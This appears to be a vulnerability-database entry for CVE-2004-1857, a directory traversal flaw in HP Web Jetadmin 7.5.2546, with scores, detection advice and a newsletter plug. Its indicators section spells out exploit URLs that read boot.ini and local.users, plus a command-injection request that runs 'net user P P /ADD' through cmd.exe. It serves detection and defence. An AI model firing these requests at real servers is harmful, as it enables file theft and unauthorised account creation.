cbcvebase.
CVE-2004-1857
published 2004-03-24

CVE-2004-1857: Directory traversal vulnerability in setinfo.hts in HP Web Jetadmin 7.5.2546 allows remote authenticated attackers to read arbitrary files via a .. (dot dot)…

PriorityP335low2.1CVSS 2.0
AVLACLAuNCPINAN
EXPLOIT
EPSS
86.83%
99.7th percentile
Directory traversal vulnerability in setinfo.hts in HP Web Jetadmin 7.5.2546 allows remote authenticated attackers to read arbitrary files via a .. (dot dot) in the setinclude parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
hpweb_jetadmin

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://<host>:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
urlhttps://<host>:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
urlhttps://<host>:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc
urlhttps://<host>:8443/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD")
path/plugins/hpjdwm/script/test/setinfo.hts
path/plugins/framework/script/tree.xms
path/plugins/hpjfpmui/script/wja_update_product.hts
port8443
commandnet user P P /ADD
  • Detect directory traversal attempts targeting the 'setinclude' parameter of setinfo.hts; look for '../' sequences in the parameter value in HTTP requests to /plugins/hpjdwm/script/test/setinfo.hts
  • Monitor HTTP requests to /plugins/framework/script/tree.xms with an 'obj' parameter containing 'WriteToFile' or shell command strings (e.g., cmd.exe, net user), indicating arbitrary command execution attempts
  • Flag access to sensitive files via traversal patterns in setinclude, specifically targeting boot.ini, local.users, or .inc firmware files
  • This vulnerability can be chained with a firmware update file upload weakness; monitor for file uploads to the HP Web Jetadmin firmware path followed by traversal reads
  • ·Exploitation requires an authenticated account; unauthenticated attackers cannot directly exploit this traversal vulnerability
  • ·Affected version is HP Web Jetadmin 7.5.2546; detections should be scoped to this version running on Windows
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.